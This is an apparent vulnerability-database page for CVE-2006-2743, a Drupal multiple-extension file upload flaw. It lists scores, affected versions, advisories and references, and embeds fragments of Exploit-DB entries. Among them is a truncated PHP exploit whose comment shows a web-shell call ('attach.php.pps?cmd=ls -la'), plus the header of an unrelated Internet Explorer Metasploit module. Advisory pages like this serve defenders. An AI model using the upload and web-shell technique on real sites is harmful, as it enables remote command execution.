CVE-2006-2743
published 2006-06-01CVE-2006-2743: Drupal 4.6.x before 4.6.7 and 4.7.0, when running on Apache with mod_mime, does not properly handle files with multiple extensions, which allows remote…
PriorityP345medium5.1CVSS 2.0
AVNACHAuNCPIPAP
EXPLOIT
EPSS
11.12%
95.4th percentile
Drupal 4.6.x before 4.6.7 and 4.7.0, when running on Apache with mod_mime, does not properly handle files with multiple extensions, which allows remote attackers to upload, modify, or execute arbitrary files in the files directory.
Affected
11 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| drupal | drupal | — | — |
| drupal | drupal | — | — |
| drupal | drupal | — | — |
| drupal | drupal | — | — |
| drupal | drupal | — | — |
| drupal | drupal | — | — |
| drupal | drupal | — | — |
| drupal | drupal | — | — |
| drupal | drupal | — | — |
| drupal | drupal | — | — |
| drupal | drupal | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-j3j6-6mpf-p2c4: Drupal 4
ghsa_unreviewed·2022-05-01
CVE-2006-2743 [MEDIUM] GHSA-j3j6-6mpf-p2c4: Drupal 4
Drupal 4.6.x before 4.6.7 and 4.7.0, when running on Apache with mod_mime, does not properly handle files with multiple extensions, which allows remote attackers to upload, modify, or execute arbitrary files in the files directory.
GHSA
GHSA-3px9-8vx9-h7qg: Drupal 4
ghsa_unreviewed·2022-05-01·CVSS 5.1
CVE-2006-2831 [MEDIUM] GHSA-3px9-8vx9-h7qg: Drupal 4
Drupal 4.6.x before 4.6.8 and 4.7.x before 4.7.2, when running under certain Apache configurations such as when FileInfo overrides are disabled within .htaccess, allows remote attackers to execute arbitrary code by uploading a file with multiple extensions, a variant of CVE-2006-2743.
No detection rules found.
Exploit-DB
Microsoft Internet Explorer - XML Core Services HTTP Request Handling (MS06-071) (Metasploit)
exploitdb·2010-07-03
CVE-2006-5745 Microsoft Internet Explorer - XML Core Services HTTP Request Handling (MS06-071) (Metasploit)
Microsoft Internet Explorer - XML Core Services HTTP Request Handling (MS06-071) (Metasploit)
---
##
# $Id: ms06_071_xml_core.rb 9669 2010-07-03 03:13:45Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Internet Explorer XML Core Services HTTP Request Handling',
'Description' => %q{
This module exploits a code execution vulnerability in Microsoft XML Core Services which
exists in the XMLHTTP ActiveX control. This module is the modifed version of
http://www.milw0rm.com/exploits/2743 - credit to str0ke. This module has been successful
Exploit-DB
Drupal 4.7 - 'Attachment mod_mime' Remote Command Execution
exploitdb·2006-05-24
CVE-2006-2743 Drupal 4.7 - 'Attachment mod_mime' Remote Command Execution
Drupal 4.7 - 'Attachment mod_mime' Remote Command Execution
---
#!/usr/bin/php -q -d short_open_tag=on
';
/*
then:
http://[target]/[path]/files/attach.php.pps?cmd=ls%20-la
also, I noticed that from an admin account you can upload .php3 or .php5 files
*/
if ($argc 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$h
No writeups or analysis indexed.
http://drupal.org/node/65409http://secunia.com/advisories/20140http://secunia.com/advisories/21244http://www.debian.org/security/2006/dsa-1125http://www.securityfocus.com/archive/1/435794/100/0/threadedhttp://www.securityfocus.com/bid/18245http://www.vupen.com/english/advisories/2006/1975https://exchange.xforce.ibmcloud.com/vulnerabilities/26655https://www.exploit-db.com/exploits/1821http://drupal.org/node/65409http://secunia.com/advisories/20140http://secunia.com/advisories/21244http://www.debian.org/security/2006/dsa-1125http://www.securityfocus.com/archive/1/435794/100/0/threadedhttp://www.securityfocus.com/bid/18245http://www.vupen.com/english/advisories/2006/1975https://exchange.xforce.ibmcloud.com/vulnerabilities/26655https://www.exploit-db.com/exploits/1821
2006-06-01
Published